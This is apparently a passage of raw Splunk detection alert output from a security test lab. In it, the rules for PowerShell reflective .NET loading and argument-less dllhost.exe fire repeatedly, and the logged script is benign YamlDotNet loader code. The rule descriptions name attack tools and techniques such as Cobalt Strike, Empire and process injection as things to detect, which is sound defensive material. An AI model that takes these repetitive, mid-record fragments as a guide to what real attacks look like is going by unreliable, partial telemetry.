\"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664708400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664708400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="3628", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664708400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664708400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0xe2c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664711731, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T10:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T10:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664711731, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T10:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T10:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664711731, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T10:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T10:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664711731, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T10:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T10:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664704800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664704800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5068", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664704800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664704800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x13cc", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664708132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T09:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T09:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664708132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T09:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T09:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net 